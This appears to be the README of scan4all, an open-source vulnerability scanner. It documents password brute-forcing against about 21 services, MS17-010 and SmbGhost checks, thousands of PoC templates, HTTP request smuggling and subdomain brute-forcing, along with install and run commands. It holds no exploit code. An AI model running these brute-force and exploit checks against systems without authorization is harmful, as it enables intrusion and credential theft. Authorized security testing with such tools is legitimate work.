  • Support [21] password blasting, support custom dictionary, open by "priorityNmap": true
    • RDP
    • SSH
    • rsh-spx
    • Mysql
    • MsSql
    • Oracle
    • Postgresql
    • Redis
    • FTP
    • Mongodb
    • SMB, also detect MS17-010 (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148), SmbGhost (CVE- 2020-0796)
    • Telnet
    • Snmp
    • Wap-wsp (Elasticsearch)
    • RouterOs
    • HTTP BasicAuth
    • Weblogic, enable nuclei through enableNuclei=true at the same time, support T3, IIOP and other detection
    • Tomcat
    • Jboss
    • Winrm(wsman)
    • POP3
  • By default, http password intelligent blasting is enabled, and it will be automatically activated when an HTTP password is required, without manual intervention
  • Detect whether there is nmap in the system, and enable nmap for fast scanning through priorityNmap=true, which is enabled by default, and the optimized nmap parameters are faster than masscan Disadvantages of using nmap: Is the network bad, because the traffic network packet is too large, which may lead to incomplete results Using nmap additionally requires setting the root password to an environment variable

  export PPSSWWDD=yourRootPswd 

More references: config/doNmapScan.sh By default, naabu is used to complete port scanning -stats=true to view the scanning progress Can I not scan ports?

noScan=true ./scan4all -l list.txt -v
# nmap result default noScan=true
./scan4all -l nmapRssuilt.xml -v
  • Fast 15000+ POC detection capabilities, PoCs include:
    • nuclei POC

    Nuclei Templates Top 10 statistics

TAG COUNT AUTHOR COUNT DIRECTORY COUNT SEVERITY COUNT TYPE COUNT
cve 1294 daffainfo 605 cves 1277 info 1352 http 3554
panel 591 dhiyaneshdk 503 exposed-panels 600 high 938 file 76
lfi 486 pikpikcu 321 vulnerabilities 493 medium 766 network 50
xss 439 pdteam 269 technologies 266 critical 436 dns 17
wordpress 401 geeknik 187 exposures 254 low 211
exposure 355 dwisiswant0 169 misconfiguration 207 unknown 7
cve2021 322 0x_akoko 154 token-spray 206
rce 313 princechaddha 147 workflows 187
wp-plugin 297 pussycat0x 128 default-logins 101
tech 282 gy741 126 file 76

281 directories, 3922 files.

  • vscan POC
    • vscan POC includes: xray 2.0 300+ POC, go POC, etc.
  • scan4all POC
  • Support 7000+ web fingerprint scanning, identification:

    • httpx fingerprint
      • vscan fingerprint
      • vscan fingerprint: including eHoleFinger, localFinger, etc.
    • scan4all fingerprint
  • Support 146 protocols and 90000+ rule port scanning

    • Depends on protocols and fingerprints supported by nmap
  • Fast HTTP sensitive file detection, can customize dictionary

  • Landing page detection

  • Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT

  • Supports multiple output types - JSON/TXT/CSV/STDOUT

  • Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]

  • Smart SSL Analysis:

    • In-depth analysis, automatically correlate the scanning of domain names in SSL information, such as *.xxx.com, and complete subdomain traversal according to the configuration, and the result will automatically add the target to the scanning list
    • Support to enable *.xx.com subdomain traversal function in smart SSL information, export EnableSubfinder=true, or adjust in the configuration file
  • Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs

  • Smart processing:

      1. When the IPs of multiple domain names in the list are the same, merge port scans to improve efficiency
      1. Intelligently handle http abnormal pages, and fingerprint calculation and learning
  • Automated supply chain identification, analysis and scanning

  • Link python3 log4j-scan

    • This version blocks the bug that your target information is passed to the DNS Log Server to avoid exposing vulnerabilities
    • Added the ability to send results to Elasticsearch for batch, touch typing
    • There will be time in the future to implement the golang version how to use?
mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan
  • Intelligently identify honeypots and skip targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable

  • Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.

  • support HTTP Request Smuggling: CL-TE、TE-CL、TE-TE、CL_CL、BaseErr 


  • Support via parameter Cookie='PHPSession=xxxx' ./scan4all -host xxxx.com, compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, http Smuggling

work process


how to install

download from Releases

go install github.com/hktalent/scan4all@2.6.9
scan4all -h

how to use

    1. Start Elasticsearch, of course you can use the traditional way to output, results
mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD /config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/ usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately
./config/initEs.sh

# Search syntax, more query methods, learn Elasticsearch by yourself
http://127.0.0.1:9200/nmap_index/_doc/_search?q=_id:192.168.0.111
where 92.168.0.111 is the target to query
  • Please install nmap by yourself before use Using Help
go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v

Work Plan

  • Integrate web-cache-vulnerability-scanner to realize HTTP smuggling smuggling and cache poisoning detection
  • Linkage with metasploit-framework, on the premise that the system has been installed, cooperate with tmux, and complete the linkage with the macos environment as the best practice
  • Integrate more fuzzers , such as linking sqlmap
  • Integrate chromedp to achieve screenshots of landing pages, detection of front-end landing pages with pure js and js architecture, and corresponding crawlers (sensitive information detection, page crawling)
  • Integrate nmap-go to improve execution efficiency, dynamically parse the result stream, and integrate it into the current task waterfall
  • Integrate ksubdomain to achieve faster subdomain blasting
  • Integrate spider to find more bugs
  • Semi-automatic fingerprint learning to improve accuracy; specify fingerprint name, configure

Q & A

  • how use Cookie?
  • libpcap related question

more see: discussions

Changelog

  • 2022-07-20 fix and PR nuclei #2301 并发多实例的bug
  • 2022-07-20 add web cache vulnerability scanner
  • 2022-07-19 PR nuclei #2308 add dsl function: substr aes_cbc
  • 2022-07-19 添加dcom Protocol enumeration network interfaces
  • 2022-06-30 嵌入式集成私人版本nuclei-templates 共3744个YAML POC; 1、集成Elasticsearch存储中间结果 2、嵌入整个config目录到程序中
  • 2022-06-27 优化模糊匹配,提高正确率、鲁棒性;集成ksubdomain进度
  • 2022-06-24 优化指纹算法;增加工作流程图
  • 2022-06-23 添加参数ParseSSl,控制默认不深度分析SSL中的DNS信息,默认不对SSL中dns进行扫描;优化:nmap未自动加.exe的bug;优化windows下缓存文件未优化体积的bug
  • 2022-06-22 集成11种协议弱口令检测、密码爆破:ftp、mongodb、mssql、mysql、oracle、postgresql、rdp、redis、smb、ssh、telnet,同时优化支持外挂密码字典
  • 2022-06-20 集成Subfinder,域名爆破,启动参数导出EnableSubfinder=true,注意启动后很慢; ssl证书中域名信息的自动深度钻取 允许通过 config/config.json 配置定义自己的字典,或设置相关开关
  • 2022-06-17 优化一个域名多个IP的情况,所有IP都会被端口扫描,然后按照后续的扫描流程
  • 2022-06-15 此版本增加了过去实战中获得的几个weblogic密码字典和webshell字典
  • 2022-06-10 完成核的整合,当然包括核模板的整合
  • 2022-06-07 添加相似度算法来检测 404
  • 2022-06-07 增加http url列表精准扫描参数,根据环境变量UrlPrecise=true开启


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